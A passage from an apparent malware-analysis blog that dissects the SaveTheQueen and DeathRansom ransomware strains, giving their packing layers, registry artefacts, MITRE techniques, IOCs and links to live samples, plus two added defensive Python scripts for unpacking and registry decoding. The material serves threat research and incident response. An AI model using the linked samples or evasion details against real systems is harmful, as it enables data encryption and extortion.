<span class="mi">6</span><span class="n">B</span> 
<span class="n">CC</span> <span class="n">C7</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">61</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">81</span> <span class="mi">30</span> <span class="n">C8</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">71</span> <span class="mi">63</span> <span class="mi">18</span> <span class="n">DB</span> <span class="n">C0</span> <span class="mi">65</span> <span class="n">A9</span> <span class="mi">5</span><span class="k">C</span> <span class="n">E9</span> <span class="n">FA</span> <span class="mi">81</span> <span class="mi">0</span><span class="n">E</span> <span class="n">AC</span> <span class="n">D5</span> <span class="n">C2</span> <span class="n">BB</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">70</span> <span class="mi">02</span> <span class="mi">88</span> <span class="n">E5</span> <span class="mi">35</span> <span class="mi">0</span><span class="n">B</span> <span class="n">DE</span> <span class="mi">01</span> <span class="n">B2</span> <span class="mi">32</span> <span class="n">D6</span> <span class="n">B5</span> <span class="n">F2</span> <span class="mi">41</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">31</span> <span class="mi">82</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">78</span> <span class="n">AF</span> <span class="n">A2</span> <span class="mi">16</span> <span class="n">F8</span> <span class="mi">88</span> <span class="n">E8</span> <span class="mi">85</span> <span class="mi">6</span><span class="n">F</span> <span class="n">CD</span> <span class="mi">48</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">02</span> <span class="n">C6</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">10</span> <span class="mi">5</span><span class="n">E</span> 
<span class="n">B3</span> <span class="n">A4</span> <span class="mi">80</span> <span class="n">BD</span> <span class="n">E1</span> <span class="mi">99</span> <span class="mi">3</span><span class="n">F</span> <span class="n">FA</span> <span class="mi">07</span> <span class="mi">63</span> <span class="mi">2</span><span class="n">B</span> <span class="n">FC</span> <span class="n">B0</span> <span class="mi">19</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">27</span> <span class="n">D4</span> <span class="mi">3</span><span class="n">D</span> <span class="n">D5</span> <span class="n">E5</span> <span class="mi">5</span><span class="k">C</span> <span class="n">D9</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">7</span><span class="n">D</span> <span class="n">D4</span> <span class="n">B6</span> <span class="mi">06</span> <span class="n">A6</span> <span class="mi">31</span> <span class="mi">43</span> <span class="n">FD</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">70</span> <span class="mi">22</span> <span class="n">A7</span> <span class="n">D1</span> <span class="mi">01</span> <span class="n">DA</span> <span class="mi">23</span> <span class="n">E2</span> <span class="mi">98</span> <span class="mi">89</span> <span class="mi">12</span> <span class="mi">07</span> <span class="n">C2</span> <span class="mi">79</span> <span class="n">BA</span> <span class="mi">6</span><span class="n">A</span> <span class="n">F5</span> <span class="mi">04</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">84</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">LockBit</span><span class="err">\</span><span class="k">Public</span><span class="p">:</span> <span class="n">DC</span> <span class="n">BD</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">75</span> <span class="n">EE</span> <span class="mi">01</span> <span class="n">DA</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">88</span> <span class="mi">1</span><span class="k">C</span> <span class="n">D8</span> <span class="n">B0</span> <span class="n">FC</span> <span class="n">B8</span> <span class="n">F8</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F0</span> <span class="mi">37</span> <span class="n">C8</span> <span class="mi">64</span> <span class="mi">06</span> <span class="mi">32</span> <span class="n">D0</span> <span class="mi">02</span> <span class="mi">70</span> <span class="n">BB</span> <span class="mi">60</span> <span class="n">D8</span> <span class="mi">55</span> <span class="n">D9</span> <span class="n">F3</span> <span class="mi">53</span> <span class="n">E6</span> <span class="n">AB</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">34</span> <span class="n">F3</span> <span class="mi">35</span> <span class="n">B2</span> <span class="mi">0</span><span class="n">D</span> <span class="n">AE</span> <span class="n">DB</span> <span class="mi">62</span> <span class="n">AB</span> <span class="mi">24</span> <span class="mi">5</span><span class="n">A</span> <span class="n">BB</span> <span class="mi">3</span><span class="n">A</span> <span class="n">EB</span> <span class="mi">74</span> <span class="n">EF</span> <span class="n">DD</span> <span class="n">BA</span> <span class="n">D1</span> 
<span class="mi">23</span> <span class="n">EE</span> <span class="n">DA</span> <span class="mi">14</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">30</span> <span class="mi">20</span> <span class="mi">34</span> <span class="n">A4</span> <span class="mi">33</span> <span class="mi">06</span> <span class="n">A8</span> <span class="n">B9</span> <span class="n">D8</span> <span class="mi">26</span> <span class="n">A6</span> <span class="n">C6</span> <span class="mi">93</span> <span class="n">D1</span> <span class="mi">66</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">51</span> <span class="n">AF</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">6</span><span class="n">D</span> <span class="n">D3</span> <span class="n">F8</span> <span class="mi">01</span> <span class="n">A3</span> <span class="n">CB</span> <span class="mi">63</span> <span class="n">BC</span> <span class="mi">04</span> <span class="mi">84</span> <span class="mi">70</span> <span class="mi">42</span> <span class="n">C4</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">75</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">33</span> <span class="mi">59</span> <span class="n">A5</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">29</span> <span class="mi">75</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">50</span> <span class="mi">18</span> <span class="n">D0</span> <span class="n">EC</span> <span class="mi">69</span> <span class="mi">93</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">84</span> <span class="mi">5</span><span class="k">C</span> <span class="n">D7</span> <span class="mi">58</span> <span 
class="mi">75</span> <span class="mi">29</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">79</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">61</span> <span class="mi">5</span><span class="k">C</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">72</span> <span class="mi">69</span> <span class="n">D8</span> <span class="mi">2</span><span class="n">A</span> <span class="n">A6</span> <span class="mi">47</span> <span class="mi">7</span><span class="n">D</span> <span class="n">BC</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">86</span> <span class="mi">74</span> <span class="mi">0</span><span class="k">C</span> <span class="n">DD</span> <span class="n">F8</span> <span class="mi">25</span> <span class="n">E7</span> <span class="mi">82</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">68</span> <span class="n">CD</span> <span class="mi">8</span><span class="n">F</span> <span class="n">A5</span> <span class="n">D6</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">17</span> <span class="mi">8</span><span class="n">A</span> <span class="n">E2</span> <span class="mi">43</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">20</span> <span class="n">C6</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">34</span> <span class="mi">25</span> <span class="n">B6</span> <span class="n">E7</span> <span class="n">CA</span> <span class="mi">82</span> <span class="mi">05</span> <span class="mi">1</span><span class="n">B</span> <span class="n">E0</span> <span class="n">A2</span> <span class="n">D4</span> <span class="n">FB</span> <span class="n">C2</span> <span 
class="n">EA</span> <span class="n">AC</span> <span class="mi">55</span> <span class="mi">10</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">07</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">47</span> <span class="mi">21</span> <span class="mi">05</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">41</span> <span class="n">A2</span> <span class="n">AF</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">98</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">60</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">0</span><span class="n">E</span> <span class="n">F2</span> <span class="mi">0</span><span class="n">A</span> <span class="n">EC</span> <span class="mi">9</span><span class="n">B</span> <span class="n">A6</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">01</span> <span class="n">CE</span> <span class="n">CA</span> <span class="n">FF</span> <span class="mi">16</span> <span class="n">EB</span> <span class="mi">4</span><span class="k">C</span> <span class="n">C0</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">28</span> <span class="mi">6</span><span class="n">E</span> <span class="n">B2</span> <span class="mi">7</span><span class="n">B</span> <span class="n">AA</span> <span class="n">B4</span> <span class="mi">02</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">21</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">6</span><span class="n">B</span> <span class="n">B5</span> <span class="n">E0</span> <span class="n">BE</span> <span class="n">E0</span> <span class="mi">05</span> <span class="mi">50</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">3</span><span class="n">F</span> 
<span class="mi">4</span><span class="n">F</span> <span class="mi">5</span><span class="k">C</span> <span class="n">FE</span> <span class="mi">73</span> <span class="n">EF</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">34</span> <span class="mi">51</span> <span class="n">FB</span> <span class="n">C1</span> <span class="n">AA</span> <span class="n">CB</span> <span class="mi">9</span><span class="n">D</span> <span class="n">F6</span> <span class="mi">9</span><span class="n">E</span> <span class="n">BC</span> <span class="mi">14</span> <span class="mi">97</span> <span class="n">FC</span> <span class="n">B2</span> <span class="n">B1</span> <span class="mi">01</span> <span class="mi">00</span> <span class="mi">01</span>
</pre></div>
<p></br></p>God save the Queen [...] 'cause Ransom is money - SaveTheQueen Encryptor2019-12-02T00:00:00+01:002019-12-02T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-02:/god-save-the-queen-cause-ransom-is-money-savethequeen-encryptor.html<p>Honestly I couldn't decide between the title above and "All crimes are paid", but Sex Pistols fans will get it regardless ¯\_(ツ)_/¯</p><p>I found this sample while browsing the new public submissions on AnyRun on the 1st of December. It piqued my interest because there were just three samples of it on the platform at the time of writing, all of them uploaded very recently.</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/queen-logo.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>SaveTheQueen @ <a href="https://app.any.run/tasks/2821049e-3bc8-4225-8ef7-ae9fde3d576b/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded/5ddc1e8586b8c95ec2571896">HybridAnalysis</a>
--> <code>sha256 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</code></p>
<p></br></p>
<p>As always one of my go-to tools is DetectItEasy. In this case it tells us that we are dealing with a .NET application, and you know what that means: let's whip out the .NET analysis VM and take a look.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/queen-die.png"></center></p>
<p></br></p>
<p>This looks pretty promising. .NET code is not compiled straight to machine code but to the Common Intermediate Language (CIL), which the runtime only JIT-compiles to native code when the program actually runs. Because the CIL and its metadata (type and method names included) ship inside the assembly, we can decompile it back to readable C# with <a href="https://www.telerik.com/products/decompiler.aspx">Telerik JustDecompile</a> or <a href="https://github.com/0xd4d/dnSpy">dnSpy</a> instead of reaching for a disassembler.</p>
<p><center><img alt="Sidebar of JustDecompile" src="https://dissectingmalwa.re/img/queen-justdecompile.png"></center></p>
<p></br></p>
<p>Looking at the output it seems we have a PowerShell script in front of us that has been run through <a href="https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1">PS2EXE</a>, a kind of "converter" for ps1 scripts to PE executables. It is a wrapper rather than a compiler: the script is stored as a Base64 string inside a small .NET host that hands it to the PowerShell engine at runtime, so the original script can be recovered from the binary.</p>
<p><center><img alt="The Base64 encoded string" src="https://dissectingmalwa.re/img/queen-string.png"></center></p>
<p></br></p>
<p>Decoding the Base64 string we got from the binary gets us two more blocks of what look like Base64 strings, with a few lines of PowerShell code between them.</p>
<p><center><img alt="Extracted Base64" src="https://dissectingmalwa.re/img/queen-base64ps.png"></center></p>
<p></br></p>
<p>Decompressing one of the gzip blocks yields a Portable Executable!</p>
<p><center><img alt="Decompressing the Code" src="https://dissectingmalwa.re/img/queen-gzipdecomp.png"></center></p>
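<p>As an added example (my code, not the post's and not anything taken from SaveTheQueen), the following Python script automates the peeling just described: it finds Base64 runs, decodes them, decompresses anything that starts with the gzip magic and stops once it reaches a PE image, recursing through as many layers as are nested. The PowerShell snippet and the "PE" it unpacks are constructed stand-ins so the script runs offline; in practice you feed it the Base64 string pulled out of the PS2EXE binary with dnSpy or JustDecompile.</p>

```python
"""Peel PS2EXE-style base64 / gzip layers down to an embedded PE image.

Added example, not code from the post.  The sample script and the fake PE
below are constructed for the demo and are NOT the real SaveTheQueen payload.
"""
import base64
import binascii
import gzip
import re
import struct

# A run of 64+ base64 alphabet characters with optional padding.  Real PS2EXE
# payloads are far longer; the floor just avoids matching ordinary identifiers.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def is_gzip(data: bytes) -> bool:
    return data[:2] == b"\x1f\x8b"


def is_pe(data: bytes) -> bool:
    """MZ header plus a 'PE\\0\\0' signature at the e_lfanew offset (0x3c)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def unpack_layers(data: bytes, depth: int = 0, max_depth: int = 8) -> list:
    """Recursively decode base64 runs and decompress gzip streams.

    Returns (kind, payload) tuples in the order the layers were peeled, where
    kind is 'base64', 'gzip' or 'pe'.  Recursion stops at a PE image, which is
    the artefact you hand to a disassembler or decompiler next.
    """
    layers = []
    if depth > max_depth:          # guard against pathological nesting
        return layers
    if is_gzip(data):
        inner = gzip.decompress(data)
        layers.append(("gzip", inner))
        return layers + unpack_layers(inner, depth + 1, max_depth)
    if is_pe(data):
        layers.append(("pe", data))
        return layers
    for match in B64_RUN.finditer(data):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue               # looked like base64 but was not (bad length/padding)
        layers.append(("base64", decoded))
        layers += unpack_layers(decoded, depth + 1, max_depth)
    return layers


def extract_pe_images(data: bytes) -> list:
    """Convenience wrapper: just the PE images found at any depth."""
    return [payload for kind, payload in unpack_layers(data) if kind == "pe"]


# ---- constructed sample input (NOT the real SaveTheQueen payload) -----------
def _fake_pe() -> bytes:
    hdr = bytearray(0x44)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)      # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    # an incompressible tail so the gzip/base64 blob is realistically long
    return bytes(hdr) + bytes(range(256))


FAKE_PE = _fake_pe()
INNER_BLOB = base64.b64encode(gzip.compress(FAKE_PE)).decode()
# What the first base64 layer decodes to: a few lines of PowerShell around the
# gzip'd blob, mimicking the PS2EXE-wrapped script seen in the post.
FAKE_SCRIPT = (
    f'$code = "{INNER_BLOB}"\n'
    "$bytes = [Convert]::FromBase64String($code)\n"
    "$ms = New-Object IO.MemoryStream(,$bytes)\n"
    "$gz = New-Object IO.Compression.GzipStream($ms, [IO.Compression.CompressionMode]::Decompress)\n"
)
# The string you would pull out of the PS2EXE binary with dnSpy / JustDecompile.
OUTER_BLOB = base64.b64encode(FAKE_SCRIPT.encode())

if __name__ == "__main__":
    for kind, payload in unpack_layers(OUTER_BLOB):
        print(f"{kind:6s} -> {len(payload):5d} bytes, starts with {payload[:4]!r}")
```

<p>The 64-character floor on the regex means a very short Base64-encoded blob (a few dozen bytes of shellcode, say) would be skipped; lower it if you suspect that. Anything that decodes to neither gzip nor PE is still reported as a <code>base64</code> layer and rescanned, which is what turns up the next stage when the chain is deeper than the one seen here.</p>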
<p>The dropped <em>.SaveTheQueen.LOG</em> was found in <strong>C:\ProgramData\</strong>. SaveTheQueen <strong>does not</strong> leave a ransom note or any other information on how to contact the crooks.</p>
<div class="highlight"><pre><span></span><span class="n">CLR</span><span class="o">:</span> <span class="mf">2.0</span><span class="o">.</span><span class="mf">50727.5420</span>
<span class="n">Drive</span><span class="o">:</span> <span class="n">C</span><span class="o">:\</span>
</pre></div>
<p><br/></p>
<p>Because the registry edits resemble something seen before in <a href="https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/what-you-need-to-know-about-the-lockergoga-ransomware">LockerGoga</a>, I'd like to make a short comparison between the two strains.</p>
<table>
<thead>
<tr>
<th align="center">"Feature"</th>
<th align="center">SaveTheQueen</th>
<th align="center">LockerGoga</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><em>Ransom note</em></td>
<td align="center">none</td>
<td align="center">txt file in %Desktop%</td>
</tr>
<tr>
<td align="center"><em>Logging</em></td>
<td align="center">C:\ProgramData\SaveTheQueen.LOG</td>
<td align="center">C:\.log</td>
</tr>
<tr>
<td align="center"><em>Registry</em></td>
<td align="center">Restartmanager\Session00xx</td>
<td align="center">Restartmanager\Session00xx</td>
</tr>
<tr>
<td align="center"><em>Binary</em></td>
<td align="center">.NET</td>
<td align="center">Visual C++</td>
</tr>
</tbody>
</table>
<p></br>
</br></p>
<h3><strong>Update 19.12.2019:</strong></h3>
<p>A new variant of the SaveTheQueen ransomware was found by MalwareHunterTeam. I'll update this article asap.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The SaveTheQueen ransomware is π...<br>The ransomware sample -> ConfuserEx -> shellcode -> embed in C# injector dll (base64 encoded) -> PowerShell script (base64 + GZip) -> PS2EXE - and not even sure if that's all...<a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a></p>— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/1207378905386094593?ref_src=twsrc%5Etfw">December 18, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </center></p>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1035</em> --> Service Execution --> Execution</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1046</em> --> Network Service Scanning --> Discovery</p>
<p><em>T1120</em> --> Peripheral Device Discovery --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>SaveTheQueen</h3>
<div class="highlight"><pre><span></span><span class="n">SaveTheQueen</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">12288</span><span class="p">:</span><span class="n">a4Gvlgr3S</span><span class="o">/</span><span class="n">Jsftu5hU17WFKp4NpBvUssesKtIKy7vr4YT0PgZ304lGrDJo8YFfDY</span><span class="p">:</span><span class="n">ayw3ZwEaSAVX8Zye</span><span class="o">/</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="k">Owner</span> <span class="c1">--> 6C 0A 00 00 26 23 E1 EB AC A6 D5 01</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">SessionHash</span> <span class="c1">--> 32 Byte Hex</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">RegFiles0000</span> <span class="c1">--> Files to be encrypted/stolen</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">RegFilesHash</span> <span class="c1">--> 32 Byte Hex</span>
</pre></div>
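<p>As an added example (my code, not the post's), here is a small Python decoder for the RestartManager session values listed above, the same artefact that appears in the <em>Registry</em> row of the SaveTheQueen/LockerGoga comparison. The 12-byte <code>Owner</code> value has the layout of the Restart Manager <code>RM_UNIQUE_PROCESS</code> structure (a DWORD process ID followed by a FILETIME process start time); reading it that way is my interpretation, not something the post states. <code>RegFiles0000</code> is assumed to be a REG_MULTI_SZ, and the file list below is constructed since the post does not reproduce the real one.</p>

```python
"""Decode RestartManager\\Session00xx values left behind by ransomware.

Added example, not code from the post.  Owner is interpreted as the
RM_UNIQUE_PROCESS structure { DWORD dwProcessId; FILETIME ProcessStartTime }
(my assumption); RegFiles0000 is assumed to be REG_MULTI_SZ.
"""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def decode_owner(value: bytes) -> dict:
    """Owner -> {pid, start_time}: the process that opened the RM session."""
    if len(value) != 12:
        raise ValueError(f"expected 12 bytes for RM_UNIQUE_PROCESS, got {len(value)}")
    pid, ft = struct.unpack("<IQ", value)          # little-endian DWORD + FILETIME
    return {"pid": pid, "start_time": filetime_to_datetime(ft)}


def decode_multi_sz(value: bytes) -> list:
    """REG_MULTI_SZ: UTF-16LE strings, NUL-separated, double-NUL terminated."""
    return [s for s in value.decode("utf-16-le").split("\x00") if s]


def describe_session(owner_hex: str, regfiles: bytes) -> dict:
    """Turn the raw registry values into something you can put in a timeline."""
    owner = decode_owner(bytes.fromhex(owner_hex))
    return {
        "pid": owner["pid"],
        "start_time": owner["start_time"].strftime("%Y-%m-%d %H:%M:%S UTC"),
        "files": decode_multi_sz(regfiles),
    }


# Owner bytes exactly as listed in the IOC section of the post.
OWNER_HEX = "6C 0A 00 00 26 23 E1 EB AC A6 D5 01"

# Constructed RegFiles0000 value; the post does not reproduce the real list.
FAKE_REGFILES = (
    "C:\\Users\\victim\\Documents\\report.docx\x00"
    "C:\\Users\\victim\\Pictures\\holiday.jpg\x00"
    "\x00"
).encode("utf-16-le")

if __name__ == "__main__":
    session = describe_session(OWNER_HEX, FAKE_REGFILES)
    print(f"session owner: PID {session['pid']} started {session['start_time']}")
    for path in session["files"]:
        print(f"  registered: {path}")
```

<p>Decoded, the Owner value above says the session was opened by PID 2668, a process started on 2019-11-29 12:02:49 UTC, two days before the sample was spotted on AnyRun, which fits the timeline in the post. Ransomware registers the files it is about to encrypt with Restart Manager so that the processes holding them open can be shut down first; that is why the RegFiles list and the owner's start time are worth collecting during incident response, and why a stale Session00xx key under a user hive is a useful hunting lead.</p>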
<p><br/></p>Quick and painless - Reversing DeathRansom / "Wacatac"2019-11-19T00:00:00+01:002019-11-19T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-11-19:/quick-and-painless-reversing-deathransom-wacatac.html<p>No flashy wallpapers or other bells and whistles, but if you aren't careful and don't maintain backups as you should, DeathRansom will take your data with it to its grave. Or will it?</p><p><center><img alt="Logo" src="https://dissectingmalwa.re/img/deathransom-logo.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>DeathRansom @ <a href="https://app.any.run/tasks/9ab9fd28-83ee-4990-9c8e-7a8169f41787/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1?environmentId=100">HybridAnalysis</a>
--> <code>sha256 3a5b015655f3aad4b4fd647aa34fda4ce784d75a20d12a73f8dc0e0d866e7e01</code></p>
<p></br></p>
<p>The plain-text note doesn't look that special. I'll be referring to this strain as DeathRansom, since the <a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.wacatac.usxvpga19">Wacatac</a> Trojan doesn't seem to be affiliated with the sample.</p>
<p><center><img alt="DeathRansom Note" src="https://dissectingmalwa.re/img/deathransom-note.png"></center></p>
<p></br></p>
<p>The "Wacatac" registry keys are most likely an attempt at a false-flag maneuver. The ransomware sets three registry keys in total: the main key <strong>HKEY_CURRENT_USER\SOFTWARE\Wacatac</strong> and two subkeys called <strong>private</strong> and <strong>public</strong>. The hex value set in "private" actually corresponds to the Lock ID referenced in the ransom note. Analysing the encryption loop will probably reveal the relation between these values, so let's keep going.</p>
<p><center><img alt="Setting the Registry Key Note" src="https://dissectingmalwa.re/img/deathransom-regKey.png"></center></p>
<p></br></p>
<p><center><img alt="Private Reg Key" src="https://dissectingmalwa.re/img/deathransom-regKey1.png"></center></p>
<p></br></p>
<p>Somewhat of a rare occurrence, but DeathRansom will actually take out the trash for you by emptying the Recycle Bin.</p>
<p><center><img alt="Emptying the recycling Bin" src="https://dissectingmalwa.re/img/deathransom-recbin.png"></center></p>
<p></br></p>
<p>Generally this sample seems to be very limited in features, but let's see how they implemented the encryption routine. Looking for <em>CreateFileW</em> we can see that it appends the <em>.wctc</em> extension to the name of the current file. But where is the encryption happening? Either they hid it very well or they just plain forgot about it.</p>
<p><center><img alt="Suspicious CreateFile" src="https://dissectingmalwa.re/img/deathransom-createFile.png"></center></p>
<p></br></p>
<p>Let's just fire up a VM and see what happens to the files after the encryption takes place so we have a better idea of what to look for. I got no UAC prompt upon running the sample and the ransom process seemed a bit fast. Checking out the sample files we can see what actually happened:</p>
<p><center><img alt="Unencrypted sample files" src="https://dissectingmalwa.re/img/deathransom-samplefiles.png"></center></p>
<p>Exactly, nothing. I don't want to jump to conclusions here, but this strain might still be in the testing stage, or it is just a plain hoax. Regardless, it is still possible that another variant turns up that will actually encrypt the files.</p>
<p></br></p>
<h2><strong>Update 25.11.2019:</strong></h2>
<p>As predicted there is <a href="https://www.bleepingcomputer.com/forums/t/708252/deathransom-wacatac-ransomware-wctc;-read-metxt-support-topic/">another version</a> of the ransomware available now, and it seems to do its job a lot more thoroughly than its predecessor. The new build doesn't seem to append a new suffix to encrypted files, and the ransom note has been adapted slightly: it now features a Bitcoin wallet address and a new e-mail contact.</p>
<p>DeathRansom V2 @ <a href="https://app.any.run/tasks/8ae02ba0-9bf2-45cb-bdcb-ba650ed94a34/">AnyRun</a> --> <code>sha256 fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8</code></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/deathransom-diev2.png"></center></p>
<p>Entropy-wise the sample doesn't seem to be packed, nor are there any weird sections or paddings. Compiler and linker versions point towards Visual Studio 2013 being used by the creators.</p>
<p></br></p>
<p><center><img alt="Packet Capture" src="https://dissectingmalwa.re/img/deathransom-pcap.png"></center></p>
<p>Looking at the packets captured during the dynamic analysis we notice a DNS request plus TCP traffic to iplogger[.]org, which was not present in the first version of the ransomware. Looks like the criminals are trying to track infections over time.</p>
<p></br></p>
<p><center><img alt="Checking out the BTC Wallet" src="https://dissectingmalwa.re/img/deathransom-btc.png"></center></p>
<p>According to <a href="https://www.blockchain.com/btc/address/1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N">Blockchain.com</a> the Bitcoin Wallet mentioned in the V2 Ransomnote doesn't have any transactions on it as of the 30th of November, which is really good news :)</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>DeathRansom</h3>
<div class="highlight"><pre><span></span><span class="n">deathransom</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1</span>
